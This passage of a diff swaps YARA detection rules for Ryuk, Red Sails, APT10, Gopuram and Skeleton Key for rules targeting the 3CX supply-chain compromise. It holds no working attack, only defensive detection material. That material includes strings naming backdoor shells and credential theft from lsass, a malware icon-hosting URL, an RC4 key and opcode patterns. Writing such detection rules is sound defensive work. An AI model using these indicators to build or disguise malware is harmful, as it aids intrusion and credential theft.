-		hash2 = "b8fcd4a3902064907fb19e0da3ca7aed72a7e6d1f94d971d1ee7a4d3af6a800d"
+		hash1 = "c828304c83619e2cb9dab80305e5286aba91742dc550e1469d91812af27101a1"
 
 	strings:
-		$x1 = "/v \"svchos\" /f" fullword wide
-		$x2 = "\\Documents and Settings\\Default User\\finish" wide
-		$x3 = "\\users\\Public\\finish" wide
-		$x4 = "lsaas.exe" fullword wide
-		$x5 = "RyukReadMe.txt" fullword wide
+		$s1 = "\\x64\\x64passldr.pdb" ascii
+		$s2 = "\\amd64\\x64pass.sys" wide
+		$s3 = "\\\\.\\DCR" fullword ascii
+		$s4 = "Open SC Mgr Error" fullword ascii
+		$s5 = "thing is ok " fullword ascii
+		$s6 = "x64pass" fullword wide
+		$s7 = "%ws\\%ws\\Security" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "4a069c1abe5aca148d5a8fdabc26751e" or pe.imphash ( ) == "dc5733c013378fa418d13773f5bfe6f1" or 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
 }
-rule SIGNATURE_BASE_Redsails_EXE : FILE
+
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects Red Sails Hacktool by WinDivert references"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e7ebbebf-e2d6-5cd3-b859-b804d39d1641"
-		date = "2017-10-02"
-		modified = "2023-12-05"
-		reference = "https://github.com/BeetleChunks/redsails"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_redsails.yar#L11-L25"
+		description = "Detects malicious DLLs related to 3CX compromise"
+		author = "X__Junior, Florian Roth (Nextron Systems)"
+		id = "a6ea3299-fde5-5206-b5db-eb3a3f5944d9"
+		date = "2023-03-29"
+		modified = "2023-04-20"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L3-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fe9232989fb29686f11ee8cd59090fb6602301b00ff12d4a0dff8279a1718086"
-		score = 75
+		logic_hash = "68f4007791d365900c84e32e076aa3cac9f3a9ed46de297f1005306554ee13f5"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a7861d25b0c038d77838ecbd5ea5674650ad4f5faf7432a6f3cfeb427433fac"
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		hash2 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
+		hash3 = "cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2"
 
 	strings:
-		$s1 = "bWinDivert64.dll" fullword ascii
-		$s2 = "bWinDivert32.dll" fullword ascii
+		$opa1 = { 4C 89 F1 4C 89 EA 41 B8 40 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 F0 FF 15 ?? ?? ?? ?? 4C 8D 4C 24 ?? 45 8B 01 4C 89 F1 4C 89 EA FF 15 }
+		$opa2 = { 48 C7 44 24 ?? 00 00 00 00 4C 8D 7C 24 ?? 48 89 F9 48 89 C2 41 89 E8 4D 89 F9 FF 15 ?? ?? ?? ?? 41 83 3F 00 0F 84 ?? ?? ?? ?? 0F B7 03 3D 4D 5A 00 00}
+		$opa3 = { 41 80 7C 00 ?? FE 75 ?? 41 80 7C 00 ?? ED 75 ?? 41 80 7C 00 ?? FA 75 ?? 41 80 3C 00 CE}
+		$opa4 = { 44 0F B6 CD 46 8A 8C 0C ?? ?? ?? ?? 45 30 0C 0E 48 FF C1}
+		$opb1 = { 41 B8 40 00 00 00 49 8B D5 49 8B CC FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 FF D4 44 8B 45 ?? 4C 8D 4D ?? 49 8B D5 49 8B CC FF 15 }
+		$opb2 = { 44 8B C3 48 89 44 24 ?? 48 8B 5C 24 ?? 4C 8D 4D ?? 48 8B CB 48 89 74 24 ?? 48 8B D0 4C 8B F8 FF 15 }
+		$opb3 = { 80 78 ?? FE 75 ?? 80 78 ?? ED 75 ?? 80 38 FA 75 ?? 80 78 ?? CE }
+		$opb4 = { 49 63 C1 44 0F B6 44 05 ?? 44 88 5C 05 ?? 44 88 02 0F B6 54 05 ?? 49 03 D0 0F B6 C2 0F B6 54 05 ?? 41 30 12}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5MB and pe.characteristics & pe.DLL and ( 2 of ( $opa* ) or 2 of ( $opb* ) )
 }
-rule SIGNATURE_BASE_Redsails_PY
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_2 : FILE
 {
 	meta:
-		description = "Detects Red Sails Hacktool - Python"
+		description = "Detects malicious DLLs related to 3CX compromise (decrypted payload)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59d5e784-70ff-5061-9867-54c905ecfd8c"
-		date = "2017-10-02"
+		id = "bf3597ff-d62b-5d21-9c9b-e46e685284cf"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "https://github.com/BeetleChunks/redsails"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_redsails.yar#L27-L45"
+		reference = "https://twitter.com/dan__mayer/status/1641170769194672128?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L32-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4c5426a427e2c25cf9e44ae5f9ec477c9ab11f611d9a0db444c36e7cae176562"
-		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6ebedff41992b9536fe9b1b704a29c8c1d1550b00e14055e3c6376f75e462661"
-		hash2 = "5ec20cb99030f48ba512cbc7998b943bebe49396b20cf578c26debbf14176e5e"
+		logic_hash = "dec8310c1f5b304a755737a0005bb33b1762f21ed380b2b98b0f5427948ab930"
+		score = 80
+		quality = 60
+		tags = "FILE"
+		hash1 = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973"
 
 	strings:
-		$x1 = "Gained command shell on host" fullword ascii
-		$x2 = "[!] Received an ERROR in shell()" fullword ascii
-		$x3 = "Target IP address with backdoor installed" fullword ascii
-		$x4 = "Open backdoor port on target machine" fullword ascii
-		$x5 = "Backdoor port to open on victim machine" fullword ascii
+		$s1 = "raw.githubusercontent.com/IconStorages/images/main/icon%d.ico" wide fullword
+		$s2 = "https://raw.githubusercontent.com/IconStorages" wide fullword
+		$s3 = "icon%d.ico" wide fullword
+		$s4 = "__tutmc" ascii fullword
+		$op1 = { 2d ee a1 00 00 c5 fa e6 f5 e9 40 fe ff ff 0f 1f 44 00 00 75 2e c5 fb 10 0d 46 a0 00 00 44 8b 05 7f a2 00 00 e8 0a 0e 00 00 }
+		$op4 = { 4c 8d 5c 24 71 0f 57 c0 48 89 44 24 60 89 44 24 68 41 b9 15 cd 5b 07 0f 11 44 24 70 b8 b1 68 de 3a 41 ba a4 7b 93 02 }
+		$op5 = { f7 f3 03 d5 69 ca e8 03 00 00 ff 15 c9 0a 02 00 48 8d 44 24 30 45 33 c0 4c 8d 4c 24 38 48 89 44 24 20 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 3 of them or 5 of them
 }
-
-rule SIGNATURE_BASE_APT_APT10_Malware_Imphash_Dec18_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_3
 {
 	meta:
-		description = "Detects APT10 malware based on ImpHashes"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2de195a3-63a4-50ac-a83d-ab0db0f784bf"
-		date = "2018-12-28"
+		description = "Detects malicious DLLs related to 3CX compromise (decrypted payload)"
+		author = "Florian Roth , X__Junior (Nextron Systems)"
+		id = "d2d361b6-8485-57eb-b6eb-88785f42e93e"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "AlienVault OTX IOCs - statistical sample analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt10.yar#L1390-L1406"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L56-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d6e2f23f3809e7a7064bfe4859db3480454a9c8b21ffac2e1e8b7b8a8906de93"
-		score = 75
+		logic_hash = "adfe04904d796690631e5841ee1ee10c767f9f4c340e5b9df78918e981359d4d"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		hash1 = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973"
+
+	strings:
+		$opa1 = { 41 81 C0 ?? ?? ?? ?? 02 C8 49 C1 E9 ?? 41 88 4B ?? 4D 03 D1 8B C8 45 8B CA C1 E1 ?? 33 C1 41 69 D0 ?? ?? ?? ?? 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 81 C2 ?? ?? ?? ?? 33 C1 43 8D 0C 02 02 C8 49 C1 EA ?? 41 88 0B 8B C8 C1 E1 ?? 33 C1 44 69 C2 ?? ?? ?? ?? 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 41 81 C0 }
+		$opa2 = { 8B C8 41 69 D1 ?? ?? ?? ?? C1 E1 ?? 33 C1 45 8B CA 8B C8 C1 E9 ?? 33 C1 81 C2 ?? ?? ?? ?? 8B C8 C1 E1 ?? 33 C1 41 8B C8 4C 0F AF CF 44 69 C2 ?? ?? ?? ?? 4C 03 C9 45 8B D1 4C 0F AF D7}
+		$opb1 = { 45 33 C9 48 89 6C 24 ?? 48 8D 44 24 ?? 48 89 6C 24 ?? 8B D3 48 89 B4 24 ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41 ?? FF 15 }
+		$opb2 = { 44 8B 0F 45 8B C6 48 8B 4D ?? 49 8B D7 44 89 64 24 ?? 48 89 7C 24 ?? 44 89 4C 24 ?? 4C 8D 4D ?? 48 89 44 24 ?? 44 89 64 24 ?? 4C 89 64 24 ?? FF 15}
+		$opb3 = { 48 FF C2 66 44 39 2C 56 75 ?? 4C 8D 4C 24 ?? 45 33 C0 48 8B CE FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 44 0F B7 44 24 ?? 33 F6 48 8B 54 24 ?? 45 33 C9 48 8B 0B 48 89 74 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 74 24 ?? FF 15 }
+		$opb4 = { 33 C0 48 8D 6B ?? 4C 8D 4C 24 ?? 89 44 24 ?? BA ?? ?? ?? ?? 48 89 44 24 ?? 48 8B CD 89 44 24 ?? 44 8D 40 ?? 8B F8 FF 15}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and ( pe.imphash ( ) == "0556ff5e5f8744bff47d4921494ba46d" or pe.imphash ( ) == "cb1194123f68a68eb14552c085b620ce" or pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "a5d0545030be75a421529c2b0be6c4bd" or pe.imphash ( ) == "94491f4a812b0297419dc888aa4fd2a5" )
+		( all of ( $opa* ) ) or ( 1 of ( $opa* ) and 1 of ( $opb* ) ) or ( 3 of ( $opb* ) )
 }
-rule SIGNATURE_BASE_Generic_Dropper : FILE
+rule SIGNATURE_BASE_SUSP_APT_MAL_NK_3CX_Malicious_Samples_Mar23_1
 {
 	meta:
-		description = "Detects Dropper PDB string in file"
-		author = "Florian Roth (Nextron Systems)"
-		id = "60ce6a5c-2e12-515b-b8cb-8c87500cb37b"
-		date = "2018-03-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/JAHZVL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_dropper_pdb.yar#L2-L17"
+		description = "Detects marker found in malicious DLLs related to 3CX compromise"
+		author = "X__Junior, Florian Roth (Nextron Systems)"
+		id = "9fc6eb94-d02f-5bcd-9f55-b6c6a8301b4f"
+		date = "2023-03-29"
+		modified = "2023-04-20"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L81-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4ef83796d232edf34a6339e00db486612a88ff2d054f1afcd524def2e53b3b7"
+		logic_hash = "dcce1f5e769a2821d746a960cd333f8042fb71c8469aa41c29bbbd0dce79369c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		hash2 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
+		hash3 = "cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2"
 
 	strings:
-		$s1 = "\\Release\\Dropper.pdb"
-		$s2 = "\\Release\\dropper.pdb"
-		$s3 = "\\Debug\\Dropper.pdb"
-		$s4 = "\\Debug\\dropper.pdb"
+		$opx1 = { 41 80 7C 00 FD FE 75 ?? 41 80 7C 00 FE ED 75 ?? 41 80 7C 00 FF FA 75 ?? 41 80 3C 00 CE }
+		$opx2 = { 80 78 ?? FE 75 ?? 80 78 ?? ED 75 ?? 80 38 FA 75 ?? 80 78 ?? CE }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Shellcode_Loader_Apr23
+rule SIGNATURE_BASE_APT_SUSP_NK_3CX_RC4_Key_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects Shellcode loader as seen being used by Gopuram backdoor"
-		author = "X__Junior (Nextron Systems)"
-		id = "363b67d6-9cac-513d-a545-1f256667bab8"
-		date = "2023-04-03"
+		description = "Detects RC4 key used in 3CX binaries known to be malicious"
+		author = "Florian Roth (Nextron Systems)"
+		id = "18ea2185-11a1-51ad-a51a-df9e6357bb58"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_gopuram_apr23.yar#L3-L18"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L100-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4e423158757c80b5e4e77f6a343323a87798c6697cf6a832aa01a146712b250"
-		score = 80
+		logic_hash = "8324b537b149ad3816b12ae0f887f66a284a8e1ef4fe7cf51eb21d59c0f055b9"
+		score = 70
 		quality = 85
-		tags = ""
-		hash1 = "6ce5b6b4cdd6290d396465a1624d489c7afd2259a4d69b73c6b0ba0e5ad4e4ad"
-		hash2 = "b56279136d816a11cf4db9fc1b249da04b3fa3aef4ba709b20cdfbe572394812"
+		tags = "FILE"
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
+		hash3 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
+		hash4 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
 
 	strings:
-		$op1 = { 41 C1 CB 0D 0F BE 03 48 FF C3 44 03 D8 80 7B ?? 00 75 ?? 41 8D 04 13 3B C6 74 }
-		$op2 = { B9 49 F7 02 78 4C 8B E8 E8 ?? ?? ?? ?? B9 58 A4 53 E5 48 89 44 24 ?? E8 ?? ?? ?? ?? B9 10 E1 8A C3 48 8B F0 E8 ?? ?? ?? ?? B9 AF B1 5C 94 48 89 44 24 ?? E8 }
+		$x1 = "3jB(2bsG#@c7"
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0xcfd0 or uint16( 0 ) == 0x5a4d ) and $x1
 }
 
-rule SIGNATURE_BASE_APT_MAL_Gopuram_Backdoor_Apr23 : FILE
+rule SIGNATURE_BASE_SUSP_3CX_App_Signed_Binary_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects Gopuram backdoor"
-		author = "X__Junior (Nextron Systems)"
-		id = "3ae5ddcb-5601-5dca-85dd-0a4772577fae"
-		date = "2023-02-24"
+		description = "Detects 3CX application binaries signed with a certificate and created in a time frame in which other known malicious binaries have been created"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b6ce4c1d-1b7b-5e0c-af4c-05cb3ad0a4e0"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_gopuram_apr23.yar#L20-L41"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L119-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa3dd1f35d27d23eb775410cceae81d5b767dc0f1636aac67f2d2e988a3ed995"
-		score = 80
+		logic_hash = "3834b5ebb5a0db27a452fda1c97c921b2c9c8702505738232b15a3ed4a47dc47"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
-		hash2 = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
+		hash1 = "fad482ded2e25ce9e1dd3d3ecc3227af714bdfbbde04347dbc1b21d6a3670405"
+		hash2 = "dde03348075512796241389dfea5560c20a3d2a2eac95c894e7bbed5e85a0acc"
 
 	strings:
-		$x1 = "%s\\config\\TxR\\%s.TxR.0.regtrans-m" ascii
-		$xop = { D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE }
-		$opa1 = { 48 89 44 24 ?? 45 33 C9 45 33 C0 33 D2 89 5C 24 ?? 48 89 74 24 ?? 48 89 5C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 44 8D 43 }
-		$opa2 = { 48 89 B4 24 ?? ?? ?? ?? 44 8D 43 ?? 33 D2 48 89 BC 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 45 33 C0 33 D2 8B F8 E8 ?? ?? ?? ?? 8D 4F ?? E8 ?? ?? ?? ?? 4C 8B 4C 24 ?? 44 8D 43 ?? 48 8B C8 8B D7 48 8B F0 44 8B F7 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8  }
+		$sa1 = "3CX Ltd1"
+		$sa2 = "3CX Desktop App" wide
+		$sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and filesize < 2MB and pe.characteristics & pe.DLL and 1 of ( $x* ) ) or all of ( $opa* )
+		uint16( 0 ) == 0x5a4d and pe.timestamp > 1669680000 and pe.timestamp < 1680108505 and all of ( $sa* ) and $sc1
 }
-rule SIGNATURE_BASE_APT_NK_MAL_DLL_Apr23_1 : FILE
+rule SIGNATURE_BASE_SUSP_3CX_MSI_Signed_Binary_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects DLLs loaded by shellcode loader (6ce5b6b4cdd6290d396465a1624d489c7afd2259a4d69b73c6b0ba0e5ad4e4ad) (relation to Lazarus group)"
+		description = "Detects 3CX MSI installers signed with a known compromised certificate and signed in a time frame in which other known malicious binaries have been signed"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c2abe266-0c21-51aa-9426-46a4f59df937"
-		date = "2023-04-03"
+		id = "15d6d8ca-6982-5095-9879-ce97269a71c6"
+		date = "2023-03-29"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_gopuram_apr23.yar#L43-L75"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L141-L166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e0a8f3896c0119ce399e83fe3e565c66144693e84996aa3d01ca1b6315521782"
-		score = 75
+		logic_hash = "b0fa9821a02803473ce8139b19d005968b03c9765cff5b9ae5428a259d88cc9f"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "69dd140f45c3fa3aaa64c69f860cd3c74379dec37c46319d7805a29b637d4dbf"
-		hash3 = "bb1066c1ca53139dc5a2c1743339f4e6360d6fe4f2f3261d24fc28a12f3e2ab9"
-		hash4 = "dca33d6dacac0859ec2f3104485720fe2451e21eb06e676f4860ecc73a41e6f9"
-		hash5 = "fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e"
+		hash1 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
+		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
 
 	strings:
-		$x1 = "vG2eZ1KOeGd2n5fr" ascii fullword
-		$s1 = "Windows %d(%d)-%s" ascii fullword
-		$s2 = "auth_timestamp: " ascii fullword
-		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" wide fullword
-		$op1 = { b8 c8 00 00 00 83 fb 01 44 0f 47 e8 41 8b c5 48 8b b4 24 e0 18 00 00 4c 8b a4 24 e8 18 00 00 48 8b 8d a0 17 00 00 48 33 cc }
-		$op2 = { 33 d2 46 8d 04 b5 00 00 00 00 66 0f 1f 44 00 00 49 63 c0 41 ff c0 8b 4c 84 70 31 4c 94 40 48 ff c2 }
-		$op3 = { 89 5c 24 50 0f 57 c0 c7 44 24 4c 04 00 00 00 c7 44 24 48 40 00 00 00 0f 11 44 24 60 0f 11 44 24 70 0f 11 45 80 0f 11 45 90 }
+		$a1 = { 84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
+		$s1 = "3CX Ltd1"
+		$s2 = "202303"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 2 of them ) or ( $x1 and 1 of ( $s* ) or 3 of them )
+		uint16( 0 ) == 0xcfd0 and $a1 and $sc1 and ( $s1 in ( filesize -20000 .. filesize ) and $s2 in ( filesize -20000 .. filesize ) )
 }
-rule SIGNATURE_BASE_APT_UNC4736_NK_MAL_TAXHAUL_3CX_Apr23_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_Macos_NK_3CX_Malicious_Samples_Mar23_1 : FILE
 {
 	meta:
-		description = "Detects TAXHAUL (AKA TxRLoader) malware used in the 3CX compromise by UNC4736"
-		author = "Mandiant"
-		id = "25a80f98-03d6-59e6-84e6-6d847a6c591e"
-		date = "2023-03-04"
+		description = "Detects malicious macOS application related to 3CX compromise (decrypted payload)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ff39e577-7063-5025-bead-68394a86c87c"
+		date = "2023-03-30"
 		modified = "2023-12-05"
-		reference = "https://www.3cx.com/blog/news/mandiant-initial-results/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_gopuram_apr23.yar#L77-L90"
+		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L168-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f67af611d0b3d96e4aaf7b3b5e49c1fb536e61a430b79ac0a0560ef3773ba140"
+		logic_hash = "c2733c2f7dcca82e5a0b2301777fb54853d04dfa893bcf88ecbec34d37e1a38a"
 		score = 80
 		quality = 85
 		tags = "FILE"
+		hash1 = "b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb"
+		hash2 = "ac99602999bf9823f221372378f95baa4fc68929bac3a10e8d9a107ec8074eca"
+		hash3 = "51079c7e549cbad25429ff98b6d6ca02dc9234e466dd9b75a5e05b9d7b95af72"
 
 	strings:
-		$p00_0 = {410f45fe4c8d3d[4]eb??4533f64c8d3d[4]eb??4533f64c8d3d[4]eb}
-		$p00_1 = {4d3926488b01400f94c6ff90[4]41b9[4]eb??8bde4885c074}
+		$s1 = "20230313064152Z0"
+		$s2 = "Developer ID Application: 3CX (33CF4654HL)"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and all of them
 }
-rule SIGNATURE_BASE_Skeleton_Key_Patcher
+rule SIGNATURE_BASE_APT_MAL_Macos_NK_3CX_DYLIB_Mar23_1
 {
 	meta:
-		description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
-		author = "Dell SecureWorks Counter Threat Unit"
-		id = "a2805cce-7605-58a4-85ce-9dff5586858e"
-		date = "2015-01-13"
+		description = "Detects malicious DYLIB files related to 3CX compromise"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a19904d3-9b2d-561f-b734-20bf09584fa7"
+		date = "2023-03-30"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/aAk3lN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_skeletonkey.yar#L3-L24"
+		reference = "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "451b77152e38a120bd8d8a832f0f7c003974113ead18aabfe043a332fb1f484c"
-		score = 70
+		logic_hash = "e52c76de1e995cc7084ddb390b60f4bc66e5bdf89aaa28ef3fd70578ed3145a6"
+		score = 80
 		quality = 85
 		tags = ""
+		hash1 = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
+		hash2 = "fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7"
 
 	strings:
-		$target_process = "lsass.exe" wide
-		$dll1 = "cryptdll.dll"
-		$dll2 = "samsrv.dll"
-		$name = "HookDC.dll"
-		$patched1 = "CDLocateCSystem"
-		$patched2 = "SamIRetrievePrimaryCredentials"
-		$patched3 = "SamIRetrieveMultiplePrimaryCredentials"
+		$xc1 = { 37 15 00 13 16 16 1B 55 4F 54 4A 5A 52 2D 13 14
+               1E 15 0D 09 5A 34 2E 5A 4B 4A 54 4A 41 5A 2D 13
+               14 4C 4E 41 5A 02 4C 4E 53 5A 3B 0A 0A 16 1F 2D
